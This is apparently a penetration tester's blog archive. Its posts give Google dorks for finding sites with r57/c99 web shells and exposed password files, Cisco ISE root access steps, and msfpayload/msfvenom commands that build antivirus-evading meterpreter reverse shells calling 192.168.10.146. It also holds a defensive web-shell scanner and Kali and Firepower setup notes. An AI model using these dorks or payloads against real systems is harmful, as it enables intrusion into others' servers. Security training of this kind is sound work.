Thank you Google for operators, and for the spiders that crawl the IoT. It never ceases to amaze me how web shells that have been around for what seems like forever are still sitting on websites today. Below are some of my favorite Google dorks.
Want to find systems that have been compromised and have the R57 or C99 web shells in their directories? Look no further.
intitle:"r57" "disable functions"
inurl:sh3llZ/c99/
This is fun! Locate files exposing sensitive information. This one reveals the password directory.
inurl:access.cnf ext:cnf
You can find these and a lot more in the GHDB.
A place to put my thoughts, and lessons learned in securing the internet of things.
Tuesday, December 22, 2015
Wednesday, March 11, 2015
Cisco ISE root access
First let me start with a disclaimer. If you do not know what you are doing, then please stop what you are doing.
Ok, so now that that is out of the way, on to the good stuff. Cisco ISE is built on top of Linux. It has a backend Linux shell which is based on the bash shell. It uses an Oracle database. For the most part you should never need to gain access to the root shell. The only way to get root access is to get a file from Cisco TAC called TACtshootx64.tar.gz. The file name may be slightly different based on what version of ISE you are using. In my past experience I have only installed this file when Cisco TAC asked me to.
Effectively, the file gives you root access which can be obtained by executing the below.
1 Put the file in your repo.
2 Install the application using the command
application install TACtshootx64.tar.gz [repo name]
3 Now to get root access:
tac root-access
You should notice that your prompt will change from
hostname/username# to [root@hostname localdisk]#
Now you are the root user and can do everything any other Linux root user can.
For example, ps -ef will show you what is running on the system and under which user.
You can shut the ISE node down by typing shutdown -h now
If you know Oracle DB commands you can edit the database that ISE runs on. Be very careful when modifying the DB. There are many links between many tables, and if you break it, you may just break ISE. Those tasks might be better left to senior level TAC support reps.
If your goal is simply to shutdown an ISE node, that can be done by logging into the node as admin or as a user that has the administrator role, and typing the command:
hostname/username# halt
Monday, March 2, 2015
Creating Shells with msfpayload, and msfvenom
msfpayload is a Metasploit utility to create shellcode. The shellcode is used to exploit targets. These exploits can be used to create bind and reverse shells. When coupled with msfencode, they can also be used to obfuscate the signature of the file to help avoid detection by antivirus, remove bad characters (null bytes), inject shellcode into executables, and perform several other tasks. Below are a few examples of how to create shellcode using msfpayload, as well as msfencode.
#Create a php reverse tcp meterpreter
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R >evil.php
#Create asp file using reverse tcp meterpreter
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R | msfencode -t asp -o rmetshell443.asp
In both of the above examples, when the victim opens the exploit, it will attempt to establish a reverse shell by connecting to 192.168.10.146 on tcp port 443.
For more information on both of these commands check out:
http://www.offensive-security.com/metasploit-unleashed/Msfencode
The makers of Metasploit in all of their absolute brilliance have made this even easier in a tool called msfvenom. Msfvenom is a combination of both msfpayload and msfencode.
# This command will create a reverse shell, remove null characters (\x00), and encode the output as an ASP file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 -e x86/shikata_ga_nai -b "\x00" -f asp > rmetshell443.asp
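Looking at this from the defender's side, here is an added example (mine, not code from the original post and not part of Metasploit) that hunts for the two kinds of file this page surfaces: the r57/c99 web-shell families from the Google dorks post above, and dropped stagers like the ones the msfpayload/msfvenom commands here produce, which carry a hard-coded IP address and port next to a raw socket call. The indicator lists, the two-indicator threshold and the sample file contents are assumptions I constructed for the example; the IP 192.168.10.146 and port 443 are the values used in the commands above.

```python
"""Heuristic scan of server-side web scripts for web-shell and reverse-connection indicators.

Constructed example for defenders. The indicator lists and threshold are assumptions made
for this demo: starting points for a hunt, not a complete signature set.
"""
import os
import re
from dataclasses import dataclass, field

# Extensions a web server would execute server-side.
SCRIPT_EXTENSIONS = {".php", ".php5", ".phtml", ".asp", ".aspx"}

# Indicator classes: (label, pattern). Order here is the order reasons are reported in.
INDICATORS = [
    # Names the r57 and c99 shell families embed in their own source (assumed list).
    ("shell family marker", re.compile(r"\b(?:r57shell|c99shell|r57|c99)\b", re.IGNORECASE)),
    # Primitives a shell uses to run attacker-supplied commands.
    ("command execution primitive",
     re.compile(r"\b(?:shell_exec|passthru|proc_open|popen|system|exec)\s*\(", re.IGNORECASE)),
    # eval() over decoded data is the classic obfuscated-payload pattern.
    ("eval of decoded input",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE)),
    # Raw outbound socket from PHP: what a reverse-connect stager needs.
    ("raw outbound socket call",
     re.compile(r"\b(?:fsockopen|pfsockopen|socket_create|stream_socket_client)\s*\(", re.IGNORECASE)),
    # A literal IPv4 address in source; legitimate apps normally read this from config.
    ("hard-coded IPv4 literal", re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")),
]


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # One indicator alone (say, a bare system() call) is common in legitimate code;
        # require two independent classes before raising the file (assumed threshold).
        return len(self.reasons) >= 2


def analyze_source(path: str, source: str) -> Finding:
    """Return the indicator classes present in one file's source text."""
    finding = Finding(path)
    for label, pattern in INDICATORS:
        if pattern.search(source):
            finding.reasons.append(label)
    return finding


def scan_webroot(root: str) -> list:
    """Walk a web root and return a Finding for every server-side script over the threshold."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    finding = analyze_source(path, fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if finding.suspicious:
                hits.append(finding)
    return hits


# Constructed samples standing in for files found under a web root (not real shells).
SAMPLES = {
    "uploads/evil.php": "<?php $ip = '192.168.10.146'; $port = 443; $s = fsockopen($ip, $port); ?>",
    "sh3llZ/c99/index.php": "<?php /* c99shell */ echo shell_exec($_GET['cmd']); ?>",
    "index.php": "<?php echo 'Hello, world'; ?>",
}


def demo() -> dict:
    """Run the analyzer over the constructed samples; returns {path: reasons}."""
    return {path: analyze_source(path, src).reasons for path, src in SAMPLES.items()}


if __name__ == "__main__":
    for path, reasons in demo().items():
        verdict = "SUSPICIOUS" if len(reasons) >= 2 else "ok"
        print(f"{path}: {verdict} {reasons}")
```

Run it against a real tree with `scan_webroot("/var/www")` and review each hit by hand; the IPv4 pattern will also match version strings and the command primitives appear in plenty of legitimate admin scripts, which is why the threshold asks for two classes rather than one.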
Wednesday, February 25, 2015
Do you KDE?
I am not a fan of GNOME, but I do like the look and feel of KDE. Switching your desktop in Kali Linux is pretty easy. You have a couple of options when it comes to using custom desktops in Kali. The first option is to stay with the default GNOME, the second option is to log in with GNOME after install and then install your favorite desktop, and the final option is to build a custom ISO.
Option 2 is pretty easy and the one that I use.
So install Kali, login as root with the password you made during the install.
I saw a great movie with my wife last night, The Internship, and in the words of Vince Vaughn, you will have to set up your wireless or wired connection and make sure you're "on the line" first.
Open a terminal, and get on with it.
apt-get update && apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop
If you are interested in installing other desktops checkout the link below.
http://docs.kali.org/live-build/customize-the-kali-desktop-environment
Troubleshooting Firepower
Capturing packets
Step 1 - Log into the sfr module via ssh
Step 2 - Execute the command:
system support capture-traffic
Step 3 - Choose option 2 to capture data from Single Context
Please choose domain to capture traffic from:
0 - eth0
1 - cplane
2 - Single Context
Selection? 2
Step 4 - Specify your options on what to capture
Please specify tcpdump options desired.
(or enter '?' for a list of supported options)
Options: -n host <ip address of 1st host> and host <ip address of 2nd host>
The above capture option will perform a packet capture of all data between the specified two hosts.
Resetting snort
Login to the sfr module using the admin credentials.
Enter the root shell by entering expert mode:
expert
Enter your admin credentials
Elevate to root permissions
sudo su -
Enter your admin credentials
pmtool restartbyid SFDataCorrelator
pmtool restartbytype snort
Finding the pid of a service.
pidof snort
Display logging information for traffic traversing the sfr
> system support firewall-engine-debug
Monday, February 23, 2015
Configuring things after kali is installed
After you complete the installation of Kali Linux, there are a few things that need to be completed as post-install tasks. Below is part 1 of the many steps I execute as part of my post-setup tasks. There is no real order to any of this, and I am writing it as I think of it.
1 Upgrade the distro to make sure you have the latest install.
apt-get update && apt-get dist-upgrade
2 Install kernel headers and virtualbox
apt-get install linux-headers-$(uname -r) dkms virtualbox
3 Install Pureftpd. This is not really required. It is just another option to use to upload stuff during penetration tests.
apt-get install pure-ftpd
4 This is a script I worked on while doing my OSCP. It will automagically configure Pure-FTPd.
#!/bin/bash
# bash script to set up and configure a pure-ftpd server with one virtual user
# (echo -e is needed for "\n" to print as a newline; plain echo prints it literally)
set -e
echo -e "[*] Creating ftpgroup and ftpuser [*]\n"
groupadd ftpgroup
# system account that owns the FTP tree; no login shell
useradd -g ftpgroup -d /home/dir -s /dev/null ftpuser
echo -e "[*] Configuring ftpuser kryptonite [*]\n"
# virtual FTP user "kryptonite" mapped onto the ftpuser system account; prompts for a password
pure-pw useradd kryptonite -u ftpuser -d /ftphome
pure-pw mkdb
# enable the PureDB (virtual user) authentication backend
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
echo -e "[*] Setting home directory to /ftphome/ [*]\n"
mkdir -p /ftphome
echo -e "[*] Setting permissions on home directory [*]\n"
chown -R ftpuser:ftpgroup /ftphome/
echo -e "[*] Setup Complete Restarting Server [*]\n"
service pure-ftpd restart